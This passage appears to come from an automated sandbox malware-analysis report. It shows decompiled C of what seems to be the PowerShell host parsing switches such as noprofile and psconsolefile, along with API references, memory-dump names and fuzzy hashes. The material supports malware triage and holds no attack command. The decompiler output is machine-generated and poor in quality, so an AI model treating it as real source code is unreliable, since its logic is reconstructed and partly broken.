                                                                                                                                                                                                                              									__eflags = _t288;
                                                                                                                                                                                                                              									if(_t288 < 0) {
                                                                                                                                                                                                                              										goto L23;
                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                              									_t290 = CompareStringW(0x7f, 1, "s", _v16,  &(_v12[1]), _v16);
                                                                                                                                                                                                                              									__eflags = _t290;
                                                                                                                                                                                                                              									if(_t290 == 0) {
                                                                                                                                                                                                                              										goto L23;
                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                              									__eflags = _t290 - 2;
                                                                                                                                                                                                                              									if(_t290 != 2) {
                                                                                                                                                                                                                              										goto L23;
                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                              									L75:
                                                                                                                                                                                                                              									_t326 = _a8;
                                                                                                                                                                                                                              									__eflags =  *_a16 - 0xffffffff;
                                                                                                                                                                                                                              									if( *_a16 == 0xffffffff) {
                                                                                                                                                                                                                              										_v20 = _v20 + 1;
                                                                                                                                                                                                                              										 *_t326 = 2;
                                                                                                                                                                                                                              										_v21 = 1;
                                                                                                                                                                                                                              										 *_a12 = 0xffffffff;
                                                                                                                                                                                                                              										 *_a4 = L"2.0";
                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                              									goto L24;
                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                              									L23:
                                                                                                                                                                                                                              									L24:
                                                                                                                                                                                                                              									_v40 = _v20;
                                                                                                                                                                                                                              									_t223 =  *_v12 & 0x0000ffff;
                                                                                                                                                                                                                              									_t365 = _t223;
                                                                                                                                                                                                                              									if(_v36 == _t223 || 0x2014 == _t223 || _t301 == _t223 || _t391 == _t223) {
                                                                                                                                                                                                                              										_v36 = _t365;
                                                                                                                                                                                                                              										_t227 = E01259200( &(_v12[1]));
                                                                                                                                                                                                                              										__eflags = _t227;
                                                                                                                                                                                                                              										if(_t227 == 0) {
                                                                                                                                                                                                                              											_t319 =  &(_v12[1]);
                                                                                                                                                                                                                              											_v16 = _t365;
                                                                                                                                                                                                                              											__eflags = 0 - _v12[1];
                                                                                                                                                                                                                              											_t230 = _t365;
                                                                                                                                                                                                                              											if(0 != _v12[1]) {
                                                                                                                                                                                                                              												_v32 = 0;
                                                                                                                                                                                                                              												_t232 = E0125CE85(_t319, 0xf,  &_v32);
                                                                                                                                                                                                                              												__eflags = _t232;
                                                                                                                                                                                                                              												if(_t232 >= 0) {
                                                                                                                                                                                                                              													_t234 = CompareStringW(0x7f, 1, L"runtimeversion", _v32,  &(_v12[1]), _v32);
                                                                                                                                                                                                                              													__eflags = _t234;
                                                                                                                                                                                                                              													if(_t234 != 0) {
                                                                                                                                                                                                                              														__eflags = _t234 - 2;
                                                                                                                                                                                                                              														if(_t234 == 2) {
                                                                                                                                                                                                                              															_t235 = _v20;
                                                                                                                                                                                                                              															_t323 = _v44 - 1;
                                                                                                                                                                                                                              															__eflags = _t235 - _t323;
                                                                                                                                                                                                                              															if(_t235 >= _t323) {
                                                                                                                                                                                                                              																_push(L"runtimeversion");
                                                                                                                                                                                                                              																goto L123;
                                                                                                                                                                                                                              															}
                                                                                                                                                                                                                              															_v20 = _t235 + 1;
                                                                                                                                                                                                                              															 *_a24 = _v40;
                                                                                                                                                                                                                              															 *_a20 =  *((intOrPtr*)(_v28 + _v20 * 4));
                                                                                                                                                                                                                              															_t370 = _v20;
                                                                                                                                                                                                                              															__eflags = _t370 - _t323;
                                                                                                                                                                                                                              															if(_t370 >= _t323) {
                                                                                                                                                                                                                              																_t240 = _v12;
                                                                                                                                                                                                                              															} else {
                                                                                                                                                                                                                              																_t382 = _t370 + 1;
                                                                                                                                                                                                                              																_v20 = _t382;
                                                                                                                                                                                                                              																_t240 =  *(_v28 + _t382 * 4);
                                                                                                                                                                                                                              																_v12 = _t240;
                                                                                                                                                                                                                              															}
                                                                                                                                                                                                                              															_t223 =  *_t240 & 0x0000ffff;
                                                                                                                                                                                                                              															L92:
                                                                                                                                                                                                                              															goto L28;
                                                                                                                                                                                                                              														}
                                                                                                                                                                                                                              														_t223 =  *_v12 & 0x0000ffff;
                                                                                                                                                                                                                              														goto L92;
                                                                                                                                                                                                                              													}
                                                                                                                                                                                                                              													_t223 =  *_v12 & 0x0000ffff;
                                                                                                                                                                                                                              													goto L92;
                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                              												_t223 = _v16 & 0x0000ffff;
                                                                                                                                                                                                                              												goto L92;
                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                              											_t223 = _t230 & 0x0000ffff;
                                                                                                                                                                                                                              											goto L92;
                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                              										_t223 = _t365 & 0x0000ffff;
                                                                                                                                                                                                                              										goto L92;
                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                              										L28:
                                                                                                                                                                                                                              										_v40 = _v20;
                                                                                                                                                                                                                              										_t241 = _t223 & 0x0000ffff;
                                                                                                                                                                                                                              										_t373 = _v12;
                                                                                                                                                                                                                              										if(0x2013 == _t241 || 0x2014 == _t241 || _t301 == _t241 || _t391 == _t241) {
                                                                                                                                                                                                                              											_t374 = _t373 + 2;
                                                                                                                                                                                                                              											_t242 = E01259200(_t374);
                                                                                                                                                                                                                              											__eflags = _t242;
                                                                                                                                                                                                                              											if(_t242 != 0) {
                                                                                                                                                                                                                              												L102:
                                                                                                                                                                                                                              												goto L32;
                                                                                                                                                                                                                              											}
    __eflags = 0 -  *_t374;
    if(0 ==  *_t374) {
        goto L102;
    }
    _v16 = 0;
    _t271 = E0125CE85( &(_v12[1]), 0xf,  &_v16);
    __eflags = _t271;
    if(_t271 < 0) {
        goto L102;
    }
    _t273 = CompareStringW(0x7f, 1, L"psconsolefile", _v16,  &(_v12[1]), _v16);
    __eflags = _t273;
    if(_t273 == 0) {
        goto L102;
    }
    __eflags = _t273 - 2;
    if(_t273 != 2) {
        goto L102;
    }
    _t339 = _v20;
    __eflags = _t339 - _v44 - 1;
    if(_t339 >= _v44 - 1) {
        _push(L"psconsolefile");
        L123:
        _t200 =  *0x12606dc; // 0x3403de0
        _t391 =  *( *_t200 + 4);
         *0x1261204(_t200, 0, 1);
         *( *( *_t200 + 4))();
        goto L124;
    }
    _v20 = _t339 + 1;
    __eflags = E0125C11A( *((intOrPtr*)(_v28 + (_t339 + 1) * 4)), 0xf);
    if(__eflags == 0) {
        L103:
        _t357 = 0xfffc0000;
        goto L45;
    }
    _push(_a12);
    _push(_a8);
    _t279 = E0125CA89(_t301,  *((intOrPtr*)(_v28 + _v20 * 4)), _a4, 0x2014, _t391, __eflags);
    __eflags = _t279;
    if(_t279 == 0) {
        goto L103;
    }
     *_a32 = _v40;
     *_a28 =  *((intOrPtr*)(_v28 + _v20 * 4));
    goto L102;
} else {
    L32:
    _t375 = 0x2013;
    _t244 =  *_v12 & 0x0000ffff;
    if(0x2013 == _t244 || 0x2014 == _t244 || _t301 == _t244 || _t391 == _t244) {
        _t377 =  &(_v12[1]);
        _t245 = E01259200(_t377);
        __eflags = _t245;
        if(_t245 != 0) {
            L110:
            _t326 = _a8;
            _t375 = 0x2013;
            goto L36;
        }
        __eflags = 0 -  *_t377;
        if(0 ==  *_t377) {
            goto L110;
        }
        _v16 = 0;
        _t266 = E0125CE85( &(_v12[1]), 0xa,  &_v16);
        __eflags = _t266;
        if(_t266 < 0) {
            goto L110;
        }
        _t268 = CompareStringW(0x7f, 1, L"noprofile", _v16,  &(_v12[1]), _v16);
        __eflags = _t268;
        if(_t268 == 0) {
            goto L110;
        }
        __eflags = _t268 - 2;
        if(_t268 == 2) {
            goto L116;
        }
        goto L110;
    } else {
        L36:
        _t247 =  *_v12 & 0x0000ffff;
        if(_t375 == _t247 || 0x2014 == _t247 || _t301 == _t247 || _t391 == _t247) {
            _t391 =  &(_v12[1]);
            _t248 = E01259200(_t391);
            __eflags = _t248;
            if(_t248 != 0) {
                L117:
                _t326 = _a8;
                goto L40;
            }
            __eflags = 0 -  *_t391;
            if(0 ==  *_t391) {
                goto L117;
            }
            _v16 = 0;
            _t260 = E0125CE85(_t391, 4,  &_v16);
            __eflags = _t260;
            if(_t260 < 0) {
                goto L117;
            }
            _t262 = CompareStringW(0x7f, 1, L"nop", _v16, _t391, _v16);
            __eflags = _t262;
            if(_t262 == 0) {
                goto L117;
            }
            __eflags = _t262 - 2;
            if(_t262 != 2) {
                goto L117;
            }
            L116:
             *_a36 = _v20;
            goto L117;
        } else {
            L40:
            _t301 = _a16;
            _t249 =  *_t301;
            if(_t249 != 0xffffffff) {
                _t391 = _a12;
                _t357 = 0;
                _t390 = _a4;
                L44:
                if(_t249 != 0xffffffff) {
                    __eflags =  *_a32 - 0xffffffff;
                    if( *_a32 != 0xffffffff) {
                         *_a8 = _v48;
                         *_t391 = _v52;
                         *_t390 = _v56;
                    }
                }
                goto L45;
            }
            if(_v21 != 0) {
                goto L46;
            }
            _t391 = _a12;
             *_t326 = 3;
            _v40 = 0;
            _v36 = 0;
             *_t391 = _t249;
            _v16 = 0;
            _t257 = E01258850( &_v16, _t326, 0xffffffff,  &_v36, _t326,  &_v40); // executed
                                                                                                                                                                                                                              													_t357 = _t257;
                                                                                                                                                                                                                              													if(_t257 != 0) {
                                                                                                                                                                                                                              														goto L45;
                                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                                              														_t390 = _a4;
                                                                                                                                                                                                                              														_t249 =  *_t301;
                                                                                                                                                                                                                              														 *_t390 = _v16;
                                                                                                                                                                                                                              														goto L44;
                                                                                                                                                                                                                              													}
                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                              			}
0x01259318
0x0125931f
0x01259327
0x01259329
0x01259330
0x01259334
0x01259337
0x0125933e
0x01259345
0x0125934c
0x0125b92d
0x0125b92d
0x00000000
0x0125935c
0x0125935c
0x01259361
0x00000000
0x00000000
0x01259367
0x0125936c
0x00000000
0x012593a4
0x012593a4
0x012593aa
0x012593b3
0x0125959b
0x0125959b
0x01259586
0x0125958b
0x01259598
0x01259598
0x012593b9
0x012593c1
0x012593c4
0x012593c9
0x012593d0
0x012593d3
0x012593d9
0x012593dc
0x012593e1
0x0125b45a
0x0125b464
0x0125b469
0x0125b46b
0x0125b47b
0x0125b480
0x0125b485
0x0125b489
0x0125b48b
0x0125b49b
0x0125b4a8
0x0125b4ab
0x0125b4b0
0x0125b4b3
0x0125b4b5
0x0125b4c5
0x0125b4d4
0x0125b4da
0x0125b4dc
0x0125b4e6
0x0125b4e9
0x0125b4f4
0x0125b4f7
0x0125b90c
0x00000000
0x0125b90c
0x0125b50d
0x0125b512
0x0125b514
0x00000000
0x00000000
0x0125b51d
0x0125b520
0x0125b529
0x0125b52c
0x0125b52f
0x0125b536
0x0125b53e
0x0125b544
0x0125b545
0x0125b548
0x0125b552
0x0125b54a
0x0125b54a
0x0125b54d
0x0125b54d
0x0125b560
0x0125b563
0x0125b566
0x0125b566
0x00000000
0x0125b566
0x0125b4eb
0x00000000
0x0125b4eb
0x0125b4de
0x00000000
0x0125b4de
0x0125b4ba
0x00000000
0x0125b4ba
0x0125b48d
0x0125b490
0x00000000
0x0125b490
0x0125b470
0x0125b473
0x00000000
0x01259402
0x01259402
0x01259405
0x01259405
0x01259410
0x0125b56e
0x0125b56e
0x0125b572
0x0125b577
                                                                                                                                                                                                                              0x0125b579
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b581
                                                                                                                                                                                                                              0x0125b584
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b592
                                                                                                                                                                                                                              0x0125b59c
                                                                                                                                                                                                                              0x0125b5a1
                                                                                                                                                                                                                              0x0125b5a3
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b5be
                                                                                                                                                                                                                              0x0125b5c4
                                                                                                                                                                                                                              0x0125b5c6
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b5cc
                                                                                                                                                                                                                              0x0125b5cf
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01259431
                                                                                                                                                                                                                              0x01259431
                                                                                                                                                                                                                              0x01259439
                                                                                                                                                                                                                              0x0125943f
                                                                                                                                                                                                                              0x0125b5d9
                                                                                                                                                                                                                              0x0125b5dd
                                                                                                                                                                                                                              0x0125b5e2
                                                                                                                                                                                                                              0x0125b5e4
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b5ec
                                                                                                                                                                                                                              0x0125b5ef
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b5fd
                                                                                                                                                                                                                              0x0125b607
                                                                                                                                                                                                                              0x0125b60c
                                                                                                                                                                                                                              0x0125b60e
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b629
                                                                                                                                                                                                                              0x0125b62f
                                                                                                                                                                                                                              0x0125b631
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b637
                                                                                                                                                                                                                              0x0125b63a
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b640
                                                                                                                                                                                                                              0x0125b643
                                                                                                                                                                                                                              0x0125b646
                                                                                                                                                                                                                              0x0125b649
                                                                                                                                                                                                                              0x0125b652
                                                                                                                                                                                                                              0x0125b655
                                                                                                                                                                                                                              0x0125b65b
                                                                                                                                                                                                                              0x0125b65f
                                                                                                                                                                                                                              0x0125b668
                                                                                                                                                                                                                              0x0125b668
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01259460
                                                                                                                                                                                                                              0x01259460
                                                                                                                                                                                                                              0x01259463
                                                                                                                                                                                                                              0x01259466
                                                                                                                                                                                                                              0x0125946c
                                                                                                                                                                                                                              0x0125946f
                                                                                                                                                                                                                              0x01259475
                                                                                                                                                                                                                              0x0125b675
                                                                                                                                                                                                                              0x0125b67f
                                                                                                                                                                                                                              0x0125b684
                                                                                                                                                                                                                              0x0125b686
                                                                                                                                                                                                                              0x0125b697
                                                                                                                                                                                                                              0x0125b69a
                                                                                                                                                                                                                              0x0125b69f
                                                                                                                                                                                                                              0x0125b6a2
                                                                                                                                                                                                                              0x0125b6a4
                                                                                                                                                                                                                              0x0125b6b1
                                                                                                                                                                                                                              0x0125b6be
                                                                                                                                                                                                                              0x0125b6c3
                                                                                                                                                                                                                              0x0125b6c5
                                                                                                                                                                                                                              0x0125b6e4
                                                                                                                                                                                                                              0x0125b6ea
                                                                                                                                                                                                                              0x0125b6ec
                                                                                                                                                                                                                              0x0125b6f6
                                                                                                                                                                                                                              0x0125b6f9
                                                                                                                                                                                                                              0x0125b706
                                                                                                                                                                                                                              0x0125b709
                                                                                                                                                                                                                              0x0125b70a
                                                                                                                                                                                                                              0x0125b70c
                                                                                                                                                                                                                              0x0125b905
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b905
                                                                                                                                                                                                                              0x0125b716
                                                                                                                                                                                                                              0x0125b71c
                                                                                                                                                                                                                              0x0125b72a
                                                                                                                                                                                                                              0x0125b72c
                                                                                                                                                                                                                              0x0125b72f
                                                                                                                                                                                                                              0x0125b731
                                                                                                                                                                                                                              0x0125b742
                                                                                                                                                                                                                              0x0125b733
                                                                                                                                                                                                                              0x0125b736
                                                                                                                                                                                                                              0x0125b737
                                                                                                                                                                                                                              0x0125b73a
                                                                                                                                                                                                                              0x0125b73d
                                                                                                                                                                                                                              0x0125b73d
                                                                                                                                                                                                                              0x0125b745
                                                                                                                                                                                                                              0x0125b748
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b748
                                                                                                                                                                                                                              0x0125b6fe
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b6fe
                                                                                                                                                                                                                              0x0125b6f1
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b6f1
                                                                                                                                                                                                                              0x0125b6ca
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01259538
                                                                                                                                                                                                                              0x0125953b
                                                                                                                                                                                                                              0x01259541
                                                                                                                                                                                                                              0x01259548
                                                                                                                                                                                                                              0x0125954f
                                                                                                                                                                                                                              0x01259559
                                                                                                                                                                                                                              0x01259568
                                                                                                                                                                                                                              0x0125956d
                                                                                                                                                                                                                              0x01259571
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01259573
                                                                                                                                                                                                                              0x01259573
                                                                                                                                                                                                                              0x01259579
                                                                                                                                                                                                                              0x0125957b
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125957b
                                                                                                                                                                                                                              0x01259571
                                                                                                                                                                                                                              0x01259503
                                                                                                                                                                                                                              0x012594d9
                                                                                                                                                                                                                              0x012594aa
                                                                                                                                                                                                                              0x01259475
                                                                                                                                                                                                                              0x0125943f
                                                                                                                                                                                                                              0x01259410
                                                                                                                                                                                                                              0x012593e1
                                                                                                                                                                                                                              0x0125936c

APIs
• CompareStringW.KERNELBASE(0000007F,00000001,version,00000000,-00000002,00000000,00000000,-00000002,00000000,?,?), ref: 0125B4D4
• CompareStringW.KERNEL32(0000007F,00000001,servermode,00000000,-00000002,00000000,00000000,00000002,00000000,?,?), ref: 0125B5BE
• CompareStringW.KERNEL32(0000007F,00000001,01253320,00000000,-00000002,00000000,00000000,-00000002,00000002,00000000,?,?), ref: 0125B629
• CompareStringW.KERNEL32(0000007F,00000001,psconsolefile,00000000,-00000002,00000000,00000000,-00000002,-00000002,00000002,00000000,?,?), ref: 0125B79C
Strings
Memory Dump Source
• Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
• Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp
• Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp
Similarity
• API ID: CompareString
• String ID: 2.0$nop$noprofile$psconsolefile$runtimeversion$servermode$version
• API String ID: 1825529933-1296109095
• Opcode ID: 55836d66961a9e4520852a7588740f7ea861fa6d4b182a1e0b3db94787775cb6
• Instruction ID: 29b89e40548798df4bba8161a4217fa6f9a235eae5fa74c7a666769d34c36b28
• Opcode Fuzzy Hash: 55836d66961a9e4520852a7588740f7ea861fa6d4b182a1e0b3db94787775cb6
• Instruction Fuzzy Hash: 24225C74A2020AAFDF64CF58C8D5AFE7BB6EB44314F548555EE51AB380D770E981CB20
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 45%
E01259873() {
	int _t11;
	intOrPtr _t15;
	void* _t16;
	intOrPtr _t21;
	void* _t23;
	intOrPtr* _t25;
	intOrPtr* _t26;
	void* _t32;
	intOrPtr _t33;
	void* _t34;
	intOrPtr* _t35;
	intOrPtr* _t37;
	void* _t39;
	void* _t45;
	void* _t46;

	_push(0x10);
	_push(0x125f3f8);
	E0125A14C(_t23, _t32, _t34);
	 *((intOrPtr*)(_t39 - 4)) = 0;
	_t35 =  *((intOrPtr*)( *[fs:0x18] + 4));
	_t33 = 0;
	while(1) {
		_t25 = _t35;
		asm("lock cmpxchg [edx], ecx");
		if(0 == 0) {
			break;
		}
		if(0 != _t35) {
			Sleep(0x3e8);
			continue;
		} else {
			_t37 = 1;
			_t33 = 1;
		}
		L6:
		_t45 =  *0x12606bc - _t37; // 0x2
		if(_t45 != 0) {
			__eflags =  *0x12606bc; // 0x2
			if(__eflags != 0) {
				 *0x1260364 = _t37;
				goto L12;
			} else {
				 *0x12606bc = _t37;
				_t21 = E012599E2(_t25, 0x1252e98, 0x1252ea4); // executed
				_pop(_t25);
				__eflags = _t21;
				if(__eflags == 0) {
					goto L12;
				} else {
					 *((intOrPtr*)(_t39 - 4)) = 0xfffffffe;
					goto L24;
				}
			}
		} else {
			L01259F44();
			_t25 = 0x1f;
			L12:
			_t46 =  *0x12606bc - _t37; // 0x2
			if(_t46 == 0) {
				_push(0x1252e94);
				L0125A146(); // executed
				_t25 = 0x1252e84;
				 *0x12606bc = 2;
			}
			if(_t33 == 0) {
				_t25 = 0x12606b8;
				 *0x12606b8 = 0;
			}
			_t49 =  *0x12606c8;
			if( *0x12606c8 != 0) {
				_t16 = E01259FA0(_t49, 0x12606c8);
				_pop(_t25);
				_t50 = _t16;
				if(_t16 != 0) {
					_t37 =  *0x12606c8; // 0x0
					_t25 = _t37;
					 *0x1261204(0, 2, 0);
					 *_t37();
				}
                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                              						_push( *0x1260370);
                                                                                                                                                                                                                              						_t11 = E01258450(_t25, 0x12606b8, _t50,  *0x1260368,  *0x126036c); // executed
                                                                                                                                                                                                                              						 *0x1260360 = _t11;
                                                                                                                                                                                                                              						if( *0x1260378 != 0) {
                                                                                                                                                                                                                              							__eflags =  *0x1260364;
                                                                                                                                                                                                                              							if( *0x1260364 == 0) {
                                                                                                                                                                                                                              								__imp___cexit();
                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                              							 *((intOrPtr*)(_t39 - 4)) = 0xfffffffe;
                                                                                                                                                                                                                              							L24:
                                                                                                                                                                                                                              							return E0125A194(0, _t33, _t37);
                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                              							exit(_t11); // executed
                                                                                                                                                                                                                              							_t26 =  *((intOrPtr*)(_t39 - 0x14));
                                                                                                                                                                                                                              							_t15 =  *((intOrPtr*)( *_t26));
                                                                                                                                                                                                                              							 *((intOrPtr*)(_t39 - 0x20)) = _t15;
                                                                                                                                                                                                                              							_push(_t26);
                                                                                                                                                                                                                              							_push(_t15);
                                                                                                                                                                                                                              							L01259E9E();
                                                                                                                                                                                                                              							return _t15;
                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                              				_t37 = 1;
                                                                                                                                                                                                                              				__eflags = 1;
                                                                                                                                                                                                                              				goto L6;
                                                                                                                                                                                                                              			}
0x01259873 0x01259875 0x0125987a 0x01259881 0x0125988a 0x0125988d 0x0125988f 0x01259894
0x01259898 0x0125989e 0x00000000 0x00000000 0x012598a2 0x012598b0 0x00000000 0x012598a4
0x012598a6 0x012598a7 0x012598a7 0x012598bb 0x012598bb 0x012598c1 0x012598cd 0x012598d3
0x01259901 0x00000000 0x012598d5 0x012598d5 0x012598e5 0x012598eb 0x012598ec 0x012598ee
0x00000000 0x012598f0 0x012598f0 0x00000000 0x012598f7 0x012598ee 0x012598c3 0x012598c5
0x012598ca 0x01259907 0x01259907 0x0125990d 0x0125990f 0x01259919 0x0125991f 0x01259920
0x01259920 0x0125992c 0x01259930 0x01259935 0x01259935 0x01259937 0x0125993e 0x01259945
0x0125994a 0x0125994b 0x0125994d 0x01259953 0x01259959 0x0125995b 0x01259961 0x01259961
0x0125994d 0x01259963 0x01259975 0x0125997d 0x01259989 0x012599c1 0x012599c8 0x012599ca
0x012599d0 0x012599d5 0x012599dc 0x012599e1 0x0125998b 0x0125998c 0x01259992 0x01259997
0x01259999 0x0125999c 0x0125999d 0x0125999e 0x012599a5 0x012599a5 0x01259989 0x012598c1
0x012598ba 0x012598ba 0x00000000

APIs
Memory Dump Source
• Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
• Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp
• Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp
Similarity
• API ID: CurrentFilterImageNonwritableSleepXcpt_amsg_exit_inittermexit
• String ID:
• API String ID: 796493780-0
• Opcode ID: 582970da646d20487a061febbfd24ccf142c049161c59c6502ec33b0c618dac7
• Instruction ID: 0fa9f28bace3a6184d401a2ba75c0a6ebafc345aa0c1dcce2f3224e77919680f
• Opcode Fuzzy Hash: 582970da646d20487a061febbfd24ccf142c049161c59c6502ec33b0c618dac7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D131D074524313DFDFB59B68F88D62A36A0FB84729F20812DFE11972E4CB705890EB58
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentConsoleFontEx.KERNELBASE(?,?,?), ref: 0337DED5
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.391222410.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: false
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConsoleCurrentFont
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2874077460-0
                                                                                                                                                                                                                              • Opcode ID: c125a737768ef7d50a418ecf2d6df2440079ce6ca7b3f09a990e90923d40de1c
                                                                                                                                                                                                                              • Instruction ID: 281e551fa9bce6f51223842abb97847e042779e5a821d87a8933cbd48d870f76
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c125a737768ef7d50a418ecf2d6df2440079ce6ca7b3f09a990e90923d40de1c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BD615B71E102589FDB20DF64C8847DEBBB6BF89304F1581AAD508BB241DB745E89CF92
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileW.KERNELBASE(00000000,?,?,?,?,?,?), ref: 0337C4AA
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.391222410.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: false
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                                                              • Opcode ID: 63fafacce5093dd128eebd3c6e7a3d7d10383c3415f434153b6f6b20327e86a8
                                                                                                                                                                                                                              • Instruction ID: 91743f88ffbc509f4ec294aa5f68dfbf7e3fa1433444c20d3dd9a49ed9aa3ca2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 63fafacce5093dd128eebd3c6e7a3d7d10383c3415f434153b6f6b20327e86a8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C441A1B1A002499FDB10DFA8D844BAEFBB5FB48314F14C16AE509AB381D775A940CFE1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.391222410.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: false
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConsoleMode
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4145635619-0
                                                                                                                                                                                                                              • Opcode ID: f35a96b9e66e19c733c0c5e19f13a345e82df9d62960ef4ce93b47492ba24b7d
                                                                                                                                                                                                                              • Instruction ID: b7f6861d9028b74d0ae139438e3430db5827c07977b4b777c90c39d404bcd4a9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f35a96b9e66e19c733c0c5e19f13a345e82df9d62960ef4ce93b47492ba24b7d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A313A75E002499FDB10DFA9D88869EFBB5FF48314F108169D918A7240E7789A45CFA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileW.KERNELBASE(00000000,?,?,?,?,?,?), ref: 0337C4AA
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.391222410.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: false
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                                                              • Opcode ID: 7e1ce9580ece15754af6a304cbe6a1463dfa6a2ae17bc142df0373854da5c977
                                                                                                                                                                                                                              • Instruction ID: 6be1f312c6430fd76a0340f7607a3f9ea36a43facbb9ff692d1f1e014fb9575f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e1ce9580ece15754af6a304cbe6a1463dfa6a2ae17bc142df0373854da5c977
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 982138B6D0025AAFCF10CF99C884AEEFBB4FB48324F148119E919A7210D375A950CFA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileW.KERNELBASE(00000000,?,?,?,?,?,?), ref: 0337C4AA
                                                                                                                                                                                                                              Memory Dump Source
